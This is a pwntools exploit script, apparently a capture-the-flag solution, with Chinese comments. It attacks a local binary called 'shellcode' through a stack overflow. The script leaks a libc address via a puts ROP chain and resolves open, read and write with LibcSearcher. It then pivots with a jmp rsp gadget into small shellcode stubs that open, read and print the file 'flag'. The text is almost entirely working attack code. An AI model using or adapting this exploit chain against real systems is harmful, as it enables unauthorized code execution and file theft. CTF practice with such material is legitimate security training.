1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
| from pwn import *
from LibcSearcher import *
context(arch='amd64', log_level='debug', os='linux')
p =process("./shellcode")
elf=ELF('shellcode')
#p = remote('39.100.87.38',23081)
pop_rdi_ret=0x0000000000400863
jmp_rsp=0x0000000000400785
vuln=0x000000000400760
main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
#第一段shellcode,制造一个flag,地址给r12(给rdi会被中途破坏掉)给open预备里面有push,所以是0x28
shellcode1='''
push 0x67616c66
mov r12,rsp
sub rsp,0x28
ret
'''
#拿到libc
payload=p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)+b'a'*8+p64(jmp_rsp)+asm(shellcode1) #8字节
p.sendlineafter("Can u pwn me?",payload)
puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
open_addr = libc_base + libc.dump('open')
read_addr = libc_base + libc.dump('read')
write_addr = libc_base + libc.dump('write')
binsh_addr = libc_base + libc.dump('str_bin_sh')
ret_addr=0x000000000040053e
#利用第一个sc放到r12里的flag传给rdi,准备好所有寄存器,调用open
shellcode2='''
mov rdi,r12
xor esi,esi
sub rsp,0x30
ret
'''
payload=p64(open_addr)+p64(main)+b'a'*24+p64(jmp_rsp)+asm(shellcode2) #8字节
p.sendlineafter("Can u pwn me?",payload)
#准备read的寄存器
shellcode3='''
mov rsi,rsp
mov edx,0x100
xor eax,eax
sub rsp,0x30
ret
'''
#调用read
payload=p64(pop_rdi_ret) + p64(3) + p64(read_addr) + p64(main)+b'a'*8+p64(jmp_rsp)+asm(shellcode3) #8字节
p.sendafter("Can u pwn me?",payload)
#直接调用write(1,file,0x100)
shellcode4='''
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
ret
'''
payload=p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)+b'a'*8+p64(jmp_rsp)+asm(shellcode4) #8字节
p.sendlineafter("Can u pwn me?",payload)
p.interactive()
|
